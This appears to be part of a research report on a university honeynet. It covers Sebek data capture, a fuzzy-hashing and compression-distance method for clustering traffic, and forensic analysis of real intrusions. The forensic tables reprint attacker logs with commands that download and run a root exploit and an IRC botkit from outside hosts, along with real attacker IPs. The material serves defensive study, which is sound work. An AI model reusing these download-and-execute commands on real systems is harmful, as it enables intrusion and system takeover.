- Walleye Web Interface, or the “Eye on the Honeywall”: a web based interface for Honeywall configuration, administration and data analysis.

6.1.6. Sebek as data capture tool

Sebek is a data capture tool designed to capture an attacker's activities on a Honeypot without the attacker knowing it. Sebek is based on a client-server architecture. The Sebek client runs on the Honeypots to capture all of the attacker’s activities (keystrokes, file transfers, passwords) and then covertly sends the data to the server. The Sebek server collects and processes this data. The server normally runs on the Honeywall gateway, but can also run independently on a remote host. Sebek is installed onto the system as a Linux kernel module (LKM) that logs all data activity associated with invoking the standard “read” and “write” system calls. This logged activity is then sent out on the network in the form of Sebek packets.
These packets are concealed from the attacker's view by the Sebek kernel module. The module itself can be concealed and can be configured to load under a user defined name to avoid detection by the attacker [11]. Sebek was used extensively in our project.

6.2. Proposed System for Automated Signature Engineering

6.2.1. Discussion

We believe that the effectiveness of a signature is directly proportional to the availability of the information needed to create it. The above discussion of automated signature generation techniques leads to the conclusion that the techniques being utilized today might be better than their predecessors, but they too have limitations. These limitations arise because authors focus on certain aspects of the problem while neglecting others. Information is only extracted from the dimension that the author addressed in his research. This information is only a small subset of the overall information that can be made available by implementing multiple techniques. There is a need for a system that can “see more” and “hear more” information in order to infer an intelligent and flexible result. Its components need to be configured so that they raise the alarm and shout “wolf” only when the wolf really comes. Such a system will search for and collect information lying anywhere on the system (disk, memory, network), generalize that information and correlate it to detect an intrusion and generate mitigation signatures for it. With multiple sources of input, this system will be capable of looking deeper into network and system events to see their behaviour. Such an approach can observe activity that would otherwise have been invisible. Behavioural analysis and correlation of system and network events will produce a new level of security awareness. This system will be able to perform the following functions:
- Ability to detect attacks.
- Ability to detect anomalies.
- Ability to classify attacks.
- Ability to detect variations in attacks (polymorphism).

6.2.2. Methodology

6.2.2.1.
Analysis of System Events

Host based intrusion detection systems can detect events going on in a host. Various services, tools and agents running on a host can be configured to log events. The level of logging is also configurable and is very helpful during debugging. Analysing this log data can reveal events of interest. A host based intrusion detection system such as OSSEC can be configured on a host to parse these logs and report information from them. Processes being run by users claim resources in the form of disk, memory, and network. These processes constantly use library functions and system calls to interact with the kernel. By tapping into such areas of the system, we can observe the behaviour of processes and assign labels to their events, e.g. file download, file copy, encrypt, decrypt, create socket, open socket, start outbound connection, etc. These behavioural patterns can be summed up into a behavioural profile that contains all characteristics of a process or event. This can be further augmented by performing static or dynamic code analysis. A behavioural profile of a system will look something like this:

Figure 9: Behavioural profile for W32-Bagle-q worm [94]

6.2.2.2. Analysis of Network Events

Researchers have often utilized the well-known 5-tuple as the basis for detection and analysis of network traffic. We propose a network behavioural profile comprising this 5-tuple along with a hashed payload. This information can easily be extracted from a flow. A flow is a unidirectional component of a TCP connection (or its UDP or ICMP equivalent) that contains all packets with the same source IP address, destination IP address, source and destination ports, and transport protocol (TCP/UDP/ICMP). A flow record contains this basic information, together with the number of packets/bytes transferred, the flow duration, and the TCP flags encountered in the flow packets.
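The flow record described above could be represented roughly as follows. This is a sketch under stated assumptions, not the project's implementation: every class, field and function name is hypothetical, the packet values are made up, and a plain SHA-256 digest stands in only as a placeholder for whichever payload hash is finally chosen.

```python
from dataclasses import dataclass, field
import hashlib


@dataclass(frozen=True)
class FlowKey:
    """The 5-tuple that identifies a unidirectional flow."""
    src_ip: str
    dst_ip: str
    src_port: int
    dst_port: int
    protocol: str  # "TCP", "UDP" or "ICMP"


@dataclass
class FlowRecord:
    """Per-flow counters plus the accumulated payload."""
    first_seen: float = 0.0
    last_seen: float = 0.0
    packet_count: int = 0
    byte_count: int = 0
    tcp_flags: int = 0  # bitwise OR of all flags seen in the flow
    payload: bytearray = field(default_factory=bytearray)

    @property
    def duration(self) -> float:
        return self.last_seen - self.first_seen

    def payload_digest(self) -> str:
        # Placeholder hash; see the assumption stated in the lead-in.
        return hashlib.sha256(bytes(self.payload)).hexdigest()


def update_flows(flows, key, timestamp, size, flags, payload):
    """Fold one observed packet into the flow table."""
    record = flows.get(key)
    if record is None:
        record = FlowRecord(first_seen=timestamp)
        flows[key] = record
    record.last_seen = timestamp
    record.packet_count += 1
    record.byte_count += size
    record.tcp_flags |= flags
    record.payload.extend(payload)
    return record


flows = {}
key = FlowKey("203.0.113.5", "192.0.2.10", 42134, 22, "TCP")
update_flows(flows, key, 10.0, 60, 0x02, b"")                      # SYN
update_flows(flows, key, 10.5, 120, 0x18, b"SSH-2.0-client\r\n")   # PSH+ACK
```

Keeping the key immutable (`frozen=True`) lets it serve directly as a dictionary key, so each packet update is a single lookup.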
From these flows we intend to:
- Extract meaningful features associated with each flow (or group of flows), and
- Use these feature values to determine whether the flow is anomalous or not.

6.2.2.3. Hashing Algorithm for Payload Hashing

We require our system to be able to detect attack variations by observing network packets. Adding the payload to the behavioural profile gives us extra information which can be helpful in classifying the flow. Since packet payloads can vary quite drastically during a communication, adding the entire ASCII or hex payload to the profile can yield abnormal results when an edit distance algorithm is run on it to calculate similarity. The requirement is to create a fingerprint of the entire payload, or of parts of it, that is unique enough to be representative of the payload and yet statistically balanced enough to identify areas of similarity when compared with other flows. One solution for representing variable size payloads as fixed size fingerprints is to hash them. A hash function is a mathematical function that maps an input of arbitrary size to a fixed size sequence that is, for practical purposes, unique to that input. Hashing is extensively used in computer security to verify the authenticity of a digital source. The most widely used hashing algorithms are MD5 and SHA. The problem with such hashing is that a slight change in the input causes an avalanche effect and drastically changes the output. This results in an entirely different hash for a slightly different payload. This is unacceptable for a system that requires an estimate of the similarity between flows: it will have a negative effect on the profile and will result in higher edit distances, so that similar flows will be marked by the system as entirely separate. Fuzzy hashing, or piecewise hashing, solves this problem. It involves the ability to compare two distinctly different items and determine a fundamental level of similarity (expressed as a percentage) between the two [82]. This technique, “spamsum”, originated as an effort by Dr.
Andrew Tridgell [83] to find commonality between spam email messages. The payload hashed with this technique is added to the profile.

Example:
Contents of file alphabet.txt: “ABCDEFGHIJKLMNOPQRSTUVWXYZ”
After modification: “ABCDEFGHIJKLMNOPQRSTUVWXYZ Edited by Fahim”

The difference in the hashes is illustrated in the table below:

                 Before                              After
md5              1d238b74da513ce35e129e7dc07060ad    fe1b01ed362cd84e549a6b397d0e3e74
fuzzy hashing    3:Pg/vmNKzug:Y/vmNKzug              3:Pg/vmNKzul6A4jFS:Y/vmNKzulrr

Table 9: Comparison of MD5 and Fuzzy Hashing

6.2.2.4. Clustering By Compression

Clusters are groups of objects that are similar according to the metric used. There are two main types of clustering:
1. Partitional
2. Hierarchical

Partitional clustering algorithms are used to determine all clusters at once. They can also be used as divisive algorithms in hierarchical clustering. Examples of partitional clustering algorithms include k-means clustering, fuzzy c-means clustering and QT clustering.

Hierarchical clustering algorithms find successive clusters using previously established clusters. They are implemented as either agglomerative “bottom-up” or divisive “top-down” algorithms.

Rudi et al. [86] proposed a new universal method of clustering by using compression. They applied their technique in diverse areas such as genetics, music, image processing, radio observations and language families. Their technique is based on the use of a parameter free similarity distance measure called the Normalized Compression Distance (NCD) for the generation of a distance matrix. The results were then clustered using a hierarchical clustering technique called the quartet method [86].
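To give a feel for how the Normalized Compression Distance behaves, the sketch below computes NCD(x, y) = (C(xy) - min{C(x), C(y)}) / max{C(x), C(y)}, where C is the compressed length under a real compressor. It is an illustration only: zlib is an assumed choice of compressor, the function names are hypothetical, and the three sample byte strings are made up rather than taken from captured traffic.

```python
import zlib


def compressed_size(data: bytes) -> int:
    """C(x): length in bytes of the zlib-compressed input."""
    return len(zlib.compress(data, 9))


def ncd(x: bytes, y: bytes) -> float:
    """Normalized Compression Distance between two byte strings."""
    cx = compressed_size(x)
    cy = compressed_size(y)
    cxy = compressed_size(x + y)
    return (cxy - min(cx, cy)) / max(cx, cy)


# Made-up samples: two near-identical HTTP requests and one unrelated banner.
http_a = b"GET /index.html HTTP/1.1\r\nHost: example.org\r\n\r\n" * 20
http_b = b"GET /login.html HTTP/1.1\r\nHost: example.org\r\n\r\n" * 20
ssh_c = b"SSH-2.0-OpenSSH_5.1 key exchange init, diffie-hellman-group14\n" * 20

similar_distance = ncd(http_a, http_b)
dissimilar_distance = ncd(http_a, ssh_c)
```

Values near 0 indicate that one input adds little new information given the other, while values near 1 indicate unrelated inputs. With a practical compressor the result is only approximate and can slightly exceed 1, so the pairwise distances are best compared with each other rather than read as absolute figures.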
NCD is a computable approximation of the normalized information distance (NID), obtained by replacing the Kolmogorov complexity K with the compressed length C produced by a real compressor. It is given by:

$$\mathrm{NCD}(x, y) = \frac{C(xy) - \min\{C(x), C(y)\}}{\max\{C(x), C(y)\}}$$

where C(x) is the compressed length of x and C(xy) is the compressed length of the concatenation of x and y. NCD is now being used in areas such as genome phylogeny, language families, clustering of music, clustering of handwritten digits for OCR, radio observations, malware, and internet traffic classification and detection.

NID is a normalized representation of the information distance E(x,y). It is given by:

$$\mathrm{NID}(x, y) = \frac{\max\{K(x \mid y), K(y \mid x)\}}{\max\{K(x), K(y)\}}$$

where K(x) is the Kolmogorov complexity of x and K(x | y) is the conditional Kolmogorov complexity of x given y. The information distance E(x,y) is “the length of the shortest binary program for the reference universal prefix Turing machine that, with input x computes y, and with input y computes x” [86], and is given by the equation:

$$E(x, y) = \max\{K(x \mid y), K(y \mid x)\}$$

Based on certain features we can see a likeness or dissimilarity among data obtained from different sources. Cilibrasi and Vitányi [86] proposed a method to express this likeness using a new similarity metric based on compression. This metric is parameter-free and does not use any features or background knowledge about the data. Thus it can find similarities in both feature-based and non-feature-based data. This compression-based similarity metric was developed as a normalized version of the “information metric”. The approach is to find significant similarity between two objects by compressing one given the information in the other, and vice versa. If two pieces are more similar, then we can describe one more succinctly given the other. The mathematics involved is based on Kolmogorov complexity theory [85].

Halvar Flake [89], along with Carrera and Erdélyi [90], has shown how executable objects can be compared using graph-based methodologies. Halvar Flake has also applied this methodology to the analysis of malware. The idea is to extract information used by worms. This is done by comparing different versions of the same executable by disassembly of the binary.
This approach gives insight into the actual information and flow of the security vulnerability. Wehner [88] discussed a fast method for guessing the family of an observed worm without disassembly.

Network traffic characterization has been studied extensively. However, very little work has been done using compression-based clustering and classification. Wehner [88] applies the Kolmogorov complexity approach [85], using compression to determine similarities in traffic. Kulkarni and Bush [91] have attempted similar methods based on Kolmogorov complexity to monitor network traffic. They, however, do not use compression. Work carried out by Evans and Barnett [92] to compare the complexity of legal FTP traffic with illegal traffic involved compression of sampled benign and attack FTP data from servers. Kulkarni, Evans and Barnett [93] measured denial of service using Kolmogorov complexity. The complexity is estimated by computing an estimate of the entropy of 1's contained in the packet. This is then tracked over time using the method of a complexity differential.

For our particular case we want to analyse data sets comprising behavioural profiles of network and system events, for which the number of clusters is not known and the data are not labelled. Hierarchical clustering suits this unsupervised setting. The relationships are represented in the form of a dendrogram, which is customarily a directed binary tree or an undirected ternary tree. To construct the tree from a distance matrix whose entries are the pair-wise distances between objects, we made use of the freely available CompLearn toolkit provided by the author [87]. This tool uses a heuristic to implement the quartet method. The heuristic is called the standardized benefit score S(t). The quartet method proposed by the author is the MQTC, or minimum quartet tree cost, problem, which is an NP-hard graph optimization problem.

6.3. Results and Discussion

We shall now see how well this technique helps us cluster the profiles that we have obtained. It would be a great achievement if we were able to detect worm-like activity or any anomaly based on benign profiles. This will create classifications based on clustering. A prototype of our method is explained here:

Proposed Hashed Technique

Packets  1         2         3         4         5         6         7         8
1        0         0.464706  0.476744  0.111842  0.184211  0.519737  0.566038  0.526316
2        0.464706  0         0.44186   0.458824  0.470588  0.594118  0.588235  0.6
3        0.476744  0.447674  0         0.47093   0.482558  0.604651  0.30814   0.616279
4        0.105263  0.458824  0.47093   0         0.173333  0.513333  0.559748  0.526667
5        0.177632  0.470588  0.482558  0.173333  0         0.496552  0.578616  0.510345
6        0.526316  0.594118  0.604651  0.526667  0.503448  0         0.408805  0.230159
7        0.578616  0.594118  0.319767  0.572327  0.584906  0.408805  0         0.421384
8        0.526316  0.605882  0.627907  0.526667  0.517241  0.246032  0.427673  0

Table 10: Proposed Hashed Technique
Legend: HTTP Packets (1-5), IRC Packets (6-8)

Old Technique (NCD only)

Packets  1         2         3         4         5         6         7         8
1        0         0.850746  0.786082  0.440789  0.447368  0.564935  0.83376   0.585526
2        0.849088  0         0.742952  0.845771  0.844113  0.855721  0.771144  0.859038
3        0.783505  0.73466   0         0.775773  0.768041  0.786082  0.099744  0.796392
4        0.440789  0.849088  0.773196  0         0.144068  0.480519  0.815857  0.412214
5        0.447368  0.84743   0.768041  0.144068  0         0.448052  0.815857  0.40458
6        0.571429  0.868988  0.793814  0.480519  0.474026  0         0.734015  0.344156
7        0.828645  0.769486  0.102302  0.815857  0.810742  0.731458  0         0.741688
8        0.592105  0.870647  0.806701  0.419847  0.419847  0.331169  0.744246  0

Table 11: Old Technique (NCD only)

The tables above show 8 packets extracted from our Honeynet pcap files. Packets 1-5 are HTTP traffic packets and Packets 6-8 are IRC-based botnet traffic. Our proposed approach shows a high similarity among the HTTP packets and among the IRC packets respectively. HTTP packets have a highest (farthest) similarity score of 0.482558 with each other, which can be treated as the upper threshold value.
IRC packets have a farthest similarity score of 0.408 with each other. This gives us a general idea of the characteristics of the traffic that the compressor can see.

Analysis of this scheme reveals that compression after hashing the payload is a far better approach than simply compressing the entire payload. As the tables illustrate, hashing the payload first yields almost twice as much compression as the previous technique. This technique can be applied to the work done by Wehner [88] to obtain an even better classification of worms. In her work Wehner [88] has implemented Cilibrasi's technique [86] of clustering based on Kolmogorov complexity [85] for clustering malware. The approach is similar to our work but differs greatly in implementation, as we use fuzzy hashing first. Her approach is fruitful but requires more resources, depending on the size of the malware being observed. Since we can represent all or part of the malware using fuzzy hashing, it is quite possible to achieve better results with less complexity and more robustness.

Another promising avenue discovered from this result is the classification of traffic based on compression results. When HTTP packets are compared with IRC packets, they give much higher values than the upper thresholds observed. Packet 3 compressed with packet 7 is, however, an exception. Although these packets are very dissimilar and, like the other cross-group pairs, are expected to give a higher (farther) similarity score (i.e. greater than 0.5), they do not. The resulting value is 0.3, suggesting a very high similarity. This is also visible in the clustering graph shown in Figure 10. This leads to the questions: “Is hashing the entire ASCII payload meeting the expected results?”, “Should we break up the payload and then hash the pieces?” and “How many bytes of the payload should be considered as a standard window size?” This is an interesting research area that we aim to address in future.
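The exception discussed above can be located mechanically from the Table 10 values. The sketch below is only an illustration and is not part of the prototype: the function names are hypothetical, the matrix is transcribed from Table 10, and the threshold is taken to be the largest HTTP-to-HTTP score, as suggested in the text.

```python
# Pairwise scores transcribed from Table 10 (proposed hashed technique).
# TABLE_10[i][j] is the score of packet i+1 against packet j+1.
TABLE_10 = [
    [0, 0.464706, 0.476744, 0.111842, 0.184211, 0.519737, 0.566038, 0.526316],
    [0.464706, 0, 0.44186, 0.458824, 0.470588, 0.594118, 0.588235, 0.6],
    [0.476744, 0.447674, 0, 0.47093, 0.482558, 0.604651, 0.30814, 0.616279],
    [0.105263, 0.458824, 0.47093, 0, 0.173333, 0.513333, 0.559748, 0.526667],
    [0.177632, 0.470588, 0.482558, 0.173333, 0, 0.496552, 0.578616, 0.510345],
    [0.526316, 0.594118, 0.604651, 0.526667, 0.503448, 0, 0.408805, 0.230159],
    [0.578616, 0.594118, 0.319767, 0.572327, 0.584906, 0.408805, 0, 0.421384],
    [0.526316, 0.605882, 0.627907, 0.526667, 0.517241, 0.246032, 0.427673, 0],
]
HTTP = [1, 2, 3, 4, 5]  # packet numbers of the HTTP group
IRC = [6, 7, 8]         # packet numbers of the IRC group


def intra_group_max(matrix, group):
    """Largest score between two different packets of the same group."""
    return max(matrix[i - 1][j - 1] for i in group for j in group if i != j)


def cross_group_exceptions(matrix, group_a, group_b, threshold):
    """Cross-group pairs (i, j, score) whose score does not exceed the threshold."""
    pairs = [(i, j) for i in group_a for j in group_b]
    # The matrix is not symmetric, so both directions are checked.
    pairs += [(j, i) for i, j in pairs]
    return sorted((i, j, matrix[i - 1][j - 1]) for i, j in pairs
                  if matrix[i - 1][j - 1] <= threshold)


if __name__ == "__main__":
    threshold = intra_group_max(TABLE_10, HTTP)  # upper threshold from the HTTP group
    for i, j, score in cross_group_exceptions(TABLE_10, HTTP, IRC, threshold):
        print(f"packet {i} vs packet {j}: {score}")
```

A check of this kind could be used to flag pairs that deserve manual inspection before the distance matrix is handed to the clustering step. Whether a single global threshold is appropriate is itself one of the open questions listed above.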
Figure 10: Clustering by Compression and hashing

Chapter 7: Results

Figure 11: Honeynet Data Graphical view (ip-port)

7.1. Summary

The virtual Honeynet was online for approximately 60 days, from 15th September 2008 to 15th November 2008. During this period we received over 30,000 identifiable attack connections. The attack results were documented as attacked ports and services, attacker IPs and country of origin.

The first attack was documented 4 days after setting up the Honeynet. After several port scans an attacker attempted an SSH brute force attack from “82.99.xx.xxx”. The geo-location of the IP was retrieved [23]. After several hundred attempts the attacker succeeded in brute forcing a user account. A botnet client was installed from a free webhosting server and IRC [25] communication was initiated; the chat sessions were translated from Romanian to English using the Google Translate service [24]. The tools and chat/commands were retrieved from this session successfully for further forensic analysis.

During the project, five similar sophisticated attacks were observed, from which valuable information and tools have been successfully retrieved. Forensic analysis has revealed a depth of information on the attackers, their organization into groups and their ties with each other; some system credentials were also logged during the chat exchange. After analysis we concluded that attackers originating from Europe are commanding a very large army of zombie hosts in China and the US to gain access to targets across the globe. Servers are always a high-value target for them, as they offer a variety of services over stable high-speed links.

Figure 11 shows a graphical representation of all the Honeynet data in the form of a linked graph. Red nodes represent source IPs, green nodes represent destination IPs, blue nodes are the destination ports and the yellow node represents the Honeypot.

7.2. Attack Statistics

Figure 12: Probed Ports

We have analysed attacks targeting our Honeynet over a period of 30 days (September 12th to October 12th), and documented them as:
- Attacked/probed ports and services
- Attacker IPs
- Attackers' country of origin

7.2.1. Attacked Ports and Services

Taking a small sample of attacked ports and services, we observed that out of a total of 29643 probed ports and services, 29048 were targeted at SSH. This indicates the attackers' focus on brute force as a means of gaining access to the server. This is followed by high activity on IRC ports, indicating botnet activity.

7.2.2. Attacker IP's

During its 30-day tenure the Honeypot received 34263 attacks from 615 unique IPs. A great number of these attacks originated from Europe and China.

Figure 13: Top 10 Attackers and Attack Magnitude

Figure 14: Probed ports (excluding SSH)

7.2.3. Attacker’s Country of Origin

615 unique attacker IP addresses were identified, originating from 79 countries across the globe. Of these 79 countries, the highest number of attacks came from China and Europe, followed by the US. The same ordering holds for the highest attack frequencies.

Figure 15: Top 50 Attacks by Country (pie chart)

7.3. Forensic Analysis

7.3.1. First Hack
September 20th, 2008

INTERPRETATION: The attacker gains access to the system, checks the running processes and kills the user cron process. Then, after checking the users connected to the box, the attacker changes the user password.
Next he gathers system information and, based on the system, downloads his botkit to the /tmp directory. The attacker then runs the botkit and unsets the history-log environment variables, pointing them to /dev/null. Finally he loads up his users file and, after verifying that everything is configured and working well, exits the system.

Refer to Appendix B for Sebek and SSH Logs

Table 12: Forensics: Hack

7.3.2. Brute Force and Botnets
Oct 6th to 8th, 2008

INTERPRETATION
[2008-10-17 15:32:57 ]-

Unsetting and Deleting History logging: After gaining user shell access on the system, the hacker checks the users currently connected to the system, unsets the history environment variables and deletes the user's .bash_history file.

Information Gathering: The hacker gathers system information such as system uptime and host information, and CPU information such as the number of processors, instruction set and cache.

The botkit: After making sure that his activities won't be logged and gathering system information, the attacker downloads his IRC bot into a hidden folder in one of the least-used shared system directories, /dev/shm. IRC bots are tools that can control a compromised system remotely via the IRC chat channels that the compromised system is set to listen to. Using IRC to control a compromised system is much more covert than using SSH directly, as the attacker no longer has to log into the system directly. Further, it allows the attacker to control several such systems, also known as zombies, at the same time. IRC bots are freely available for the legitimate purpose of controlling and maintaining IRC channels; those customized for malicious intent are referred to here as botkits.

Table 13: Forensics: Brute Force and Botnets

7.3.3. More Botnets
October 18, 2008
92.81.123.209

auth.log.0:Oct 19 07:32:02 paul-desktop sshd[13538]: Accepted password for john from 92.81.123.209 port 54571 ssh2

INTERPRETATION: Most probably the attacker’s IP, as he knew the password directly, without any wrong attempts whatsoever.
Conclusion:
1. Attackers upload botkits to free webhosting sites as JPEGs, possibly because webhosting companies do not scan JPEG files or treat them differently.
2. It is our responsibility to inform these webhosting companies of the illicit content that is being hosted by them and exploited by attackers.

Table 14: Forensics: More Botnets

7.3.4. Coordinated Attacks
23rd October, 2008
88.191.98.14 and 91.22.242.105

INTERPRETATION: The attacker brute forced the server using an SSH scanner from 88.191.98.14 and immediately connected to it using 91.22.242.105. After getting shell access as a user, the attacker checks for current online users and system CPU information. Then he downloads his botkit onto the server. He then extracts, configures and runs the botkit and, after verifying that everything is running successfully, deletes the file. This particular hacker, however, doesn't seem to care much about covering his tracks by deleting history, and leaves the history file intact (rather careless for a skillful hacker). Deutsche Telekom was informed of this attack and the necessary logs were provided to block the attacker.

Table 15: Forensics: Coordinated Attacks

7.3.5. Local Privilege Escalation attempt
91.22.238.14
24th October, 2008

Sebek Logs:

INTERPRETATION: The attacker gains access to the system, determines the CPU information, downloads exploit tools appropriate to the host architecture and OS, and attempts to escalate his privileges on the system. This attempt was, however, not successful.

    w
    exit
    ps x
    ls
    cat /proc/cpuinfo
    exit
    uname -a
    sudo su
    wget ciofu.altervista.org/xpl
    chmod +x xpl
    ./xpl
    w
    history

    $ ls
    Desktop Documents Examples Music Pictures Public Templates Videos xpl
    john@paul-desktop:~$ ./xpl
    -----------------------------------
    Linux vmsplice Local Root Exploit By MarkyZuL
    -----------------------------------
    [-] mmap: Permission denied

Table 16: Forensics: Local Privilege Escalation attempt

7.3.6. Forensics of an Encrypted Botnet
86.55.235.80
5th and 7th November:

/var/log/auth.log:Nov 5 20:01:22 paul-desktop sshd[21290]: Accepted password for john from 86.55.235.80 port 1684 ssh2
/var/log/auth.log:Nov 7 16:38:07 paul-desktop sshd[23247]: Accepted password for john from 86.55.235.80 port 2916 ssh2

[2008-11-05 07:01:32 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#w
[2008-11-05 07:01:40 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#uname -a
[2008-11-05 07:01:46 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#ps x
[2008-11-05 07:01:55 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#ls -a
[2008-11-05 07:02:10 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cat .bash_history
[2008-11-05 07:03:17 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cat /proc/cpuinfo
[2008-11-05 07:03:28 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#passwd
[2008-11-05 07:06:45 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cd xpl
[2008-11-05 07:07:22 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#chmod +x xpl
[2008-11-05 07:09:47 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#./xpl
-----------------------------------
Linux vmsplice Local Root Exploit By MarkyZuL
-----------------------------------
[-] mmap: Permission denied
[2008-11-07 03:38:40 Host:130.195.4.20 UID:1001 PID:23251 FD:0 INO:3 COM:bash ]#wget http://www12.asphost4free.com/mrtiger/psybnc-linux.tgz ; tar zxvf psybnc-linux.tgz ; cd psybnc-linux ; cd psybnc ; chmod +x * ; ./psybnc
[2008-11-07 03:38:40 Host:130.195.4.20 UID:1001 PID:23251 FD:0 INO:3 COM:bash ]#ls -a

INTERPRETATION: The attacker was aware of the password and connected in a single attempt.
He then downloaded a psyBNC botkit that listens on port 31337. psyBNC is an easy-to-use, multi-user, permanent IRC bouncer with many features. Analysis of the 31337 logs yielded the nicks of the attackers: “braincode”, “impertinent” and “JSP”. A simple Google search revealed a server allowing open directory access, which held IRC files containing data from these 3 nicks: http://203.188.159.61/cgvak/wq/ (a server that is hosting Australian websites).

Table 17: Forensics of Encrypted Botnet

7.3.6.3. Forensics of a Hacker’s IRC session

Observations and Comments: After brute forcing into our Linux Honeypot, one attacker downloaded his botkit, configured, compiled and executed it, thus adding our Honeypot to his existing botnet chain originating from the Netherlands (195.47.220.2). The attackers did not encrypt their IRC session; as a result we were able to collect and analyze logs from this plain-text IRC session. Focusing on a single event, we see 4 hackers communicating under the aliases “luv!~bido”, “Dracos!~Volk3R”, “Muzik! Mytzu” and “dog!~dog”. The language used by the attackers was checked using Google Translate and found to be Romanian. The attackers engaged in a very casual and informal conversation, making fun of each other's skills, teasing and abusing each other, and in between exchanging critical information on scanned subnets, vulnerabilities and vulnerable hosts, target IPs and, most importantly, usernames and passwords set up on compromised hosts. All this and much more went over the wire in plain text. To our excitement, while discussing some compromised hosts, hacker “luv!~bido” revealed FTP credentials for a compromised machine in Germany (62.75.252.121).
We now had credentials of a machine owned by the hackers themselves.

Table 18: Forensics of a hacker's IRC session

8. Achievements

- I have had a paper published at the recent Australasian Telecommunications Networks and Applications Conference (ATNAC 2009), held in Canberra, Australia in November 2009.
- I presented my paper at the conference in Canberra, Australia.
- I have prepared a poster on my work.
- I have set up a virtual Honeynet at Massey University.
- I have collaborated with industry by setting up a Honeynet at a web-hosting company known as Spinning Planet.

9. Research Plan

References:

[1] Spitzner, L. (2002). Honeypots: Tracking Hackers. US: Addison Wesley. 1-430.
[2] Stoll, C. The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage. Pocket Books, New York, 1990.
[3] Cheswick, B. (1991). “An Evening with Berferd, in Which a Cracker Is Lured, Endured, and Studied.” Forum of Incident Response and Security Teams (FIRST).
[4] The Honeynet Project. http://project.Honeynet.org
[5] CERT Advisory CA-2001-31: Buffer Overflow in CDE Subprocess Control Service. http://www.cert.org/advisories/CA-2001-31.html
[6] Provos, N. and Holz, T. (July 26, 2007). Virtual Honeypots: From Botnet Tracking to Intrusion Detection. US: Addison-Wesley Professional.
[7] Talabis, R. (2005). The Gen II and Gen III Honeynet Architecture. Available: http://www.philippineHoneynet.org/index2.php?option=com_docmanandtask=doc_viewandgid=11andItemid=29. Last accessed June, 2008.
[8] William Stallings, “Cryptography and Network Security Principles and Practices”, Third Edition, Prentice Hall, 2003.
[9] Security architecture for open systems interconnection for CCITT applications, ITU-T, Study Group VII - Data Communications Networks, 1991.
[10] Snort user manual 2.8.3, www.snort.org
[11] Know Your Enemy: Sebek, A kernel based data capture tool, The Honeynet Project, http://www.Honeynet.org, Last Modified: 17 November 2003.
[12] Shuja, F. (October, 2006). Virtual Honeynet: Deploying Honeywall using VMware. Available: http://www.Honeynet.pk/Honeywall/index.htm. Last accessed June, 2008.
[13] Robert McGrew, Rayford B. Vaughn, Jr. Experiences With Honeypot Systems: Development, Deployment, and Analysis. Proceedings of the 39th Hawaii International Conference on System Sciences, 2006.
[14] Levine, J., LaBella, R., Owen, H., Contis, D., Culver, B. (2003). The Use of Honeynets to Detect Exploited Systems. Proceedings of the 2003 IEEE. 3 (2).
[15] McGrew, R., Rayford B. Vaughn, Jr. (2006). Experiences With Honeypot Systems: Development, Deployment, and Analysis. Proceedings of the 39th Hawaii International Conference on System Sciences.
[16] Edward, B and Camilo, Viecco. (2005). Towards a Third Generation Data Capture Architecture for Honeynets. Proceedings of the 2005 IEEE, Workshop on Information Assurance and Security, United States Military Academy, West Point, NY. 1 (1), p21-28.
[17] Snort, 2006, SNORT - The de facto standard on Intrusion Detection and Prevention, www.Snort.org
[18] VMware. (2008). VMware Server 1.0.6 Free. Available: http://www.vmware.com/download/server. Last accessed 20 Aug 2008.
[19] VMware. (2006). VMware Server Virtual Machine Guide. Available: http://pubs.vmware.com/server1/wwhelp/wwhimpl/js/html/wwhelp.htm. Last accessed 2 August 2008.
[20] “The Honeynet Project, 1999”.
[21] Duncan Napier. IPTables/NetFilter - Linux’s next generation stateful packet filter. Sys Admin: The Journal for UNIX Systems Administrators, 10(12):8, 10, 12, 14, 16, December 2001.
[22] The Honeynet Project. (2005). Know Your Enemy: Honeywall CDROM Roo. Available: http://old.Honeynet.org/papers/cdrom/Roo/index.html. Last accessed 5 May 2008.
[23] V. N. Padmanabhan and L. Subramanian. Determining the geographic location of Internet hosts. In SIGMETRICS/Performance, pages 324-325, 2001.
[24] Google.com. (2009). Google Translate. Available: http://translate.google.com/. Last accessed 15 December 2008.
[25] J. Oikarinen and D. Reed, “Internet Relay Chat Protocol RFC 1459,” 1993.
[26] Paul Barham, Boris Dragovic, Keir Fraser, Steven Hand, Tim Harris, Alex Ho, Rolf Neugebauer, Ian Pratt, Andrew Warfield, Xen and the art of virtualization, Proceedings of the nineteenth ACM symposium on Operating systems principles, October 19-22, 2003, Bolton Landing, NY, USA.
[27] VirtualBox. (2004). Sun VirtualBox® User Manual. Available: http://www.virtualbox.org/manual/UserManual.html. Last accessed 20 July 2008.
[28] S. Marcinkowski, Extranets: The Weakest Link and Security, 2001.
[29] Arnold, T. (2001). A Method for Securing Credit Card and Private Consumer Data in E-Business Sites: CyberSource Corporation.
[30] Defence in Depth: A practical strategy for achieving Information Assurance in today’s highly networked environments.
[31] S.L. Shaffer and A.R. Simon, Network Security, Academic Press, 1994.
[32] S.G. Schwartz, Practical Unix and Internet Security, 3rd Edition, O'Reilly Media, Inc, 2003.
[33] M. Gasser, Building a secure computer system, 1988.
[34] Digital Forensics Research Workshop. “A Road Map for Digital Forensics Research” 2001. www.dfrws.org
[35] Caloyannides, Michael A. Computer Forensics and Privacy. Artech House, Inc. 2001.
[36] S. Mukkamala and A.H. Sung, "Identifying Significant Features for Network Forensic Analysis Using Artificial Intelligent Techniques," International Journal, vol. 1, 2003, pp. 1-17.
[37] S. Hansman and R. Hunt, "A taxonomy of network and computer attacks," Computers and Security, vol. 24, 2005, pp. 31-43.
[38] E.D. Security, "A Guide to Cyber Crime Security in 2010," Security, 2009, p. 3.
[39] B. Cox, "Dress Your E-Security in Layers," internet.com, 2001, p. 1.
